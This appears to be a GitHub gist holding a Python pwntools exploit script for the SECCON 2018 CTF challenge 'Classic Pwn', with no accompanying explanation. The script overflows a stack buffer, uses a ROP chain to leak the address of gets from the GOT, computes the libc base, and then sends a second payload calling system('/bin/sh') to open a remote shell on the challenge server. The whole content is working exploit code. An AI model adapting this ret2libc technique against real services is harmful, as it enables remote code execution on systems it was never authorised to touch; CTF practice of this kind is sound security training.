Skip to content

Instantly share code, notes, and snippets.

@ywkw1717

ywkw1717/classic_pwn

Created October 28, 2018 08:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ywkw1717/f646460246f683f17c5bbb9a0d9c9561 to your computer and use it in GitHub Desktop.
Save ywkw1717/f646460246f683f17c5bbb9a0d9c9561 to your computer and use it in GitHub Desktop.
Download ZIP
SECCON 2018 Online CTF Classic Pwn
Raw
classic_pwn
#!/usr/bin/env python
from pwn import *
def main():
# conn = process("./classic_aa9e979fd5c597526ef30c003bffee474b314e22")
conn = remote("classic.pwn.seccon.jp", 17354)
elf = ELF("./classic_aa9e979fd5c597526ef30c003bffee474b314e22")
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc = ELF("./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253")
popret = 0x400753
# first payload
payload = "A" * 72
payload += p64(popret)
payload += p64(elf.got["gets"])
payload += p64(elf.plt["puts"])
payload += p64(elf.symbols["main"]) # return address
conn.recvuntil(">> ")
conn.sendline(payload)
conn.recvuntil("Have a nice pwn!!\n")
leak_addr = u64(conn.recv(6) + "\x00\x00")
libc_base = leak_addr - libc.symbols["gets"]
system_addr = libc_base + libc.symbols["system"]
print "libc_base: " + hex(libc_base)
print "system_addr: " + hex(system_addr)
# second payload
payload = "A" * 72
payload += p64(popret)
payload += p64(libc_base + next(libc.search('/bin/sh')))
payload += p64(system_addr)
payload += p64(0xdeadbeef)
conn.recvuntil(">> ")
conn.sendline(payload)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment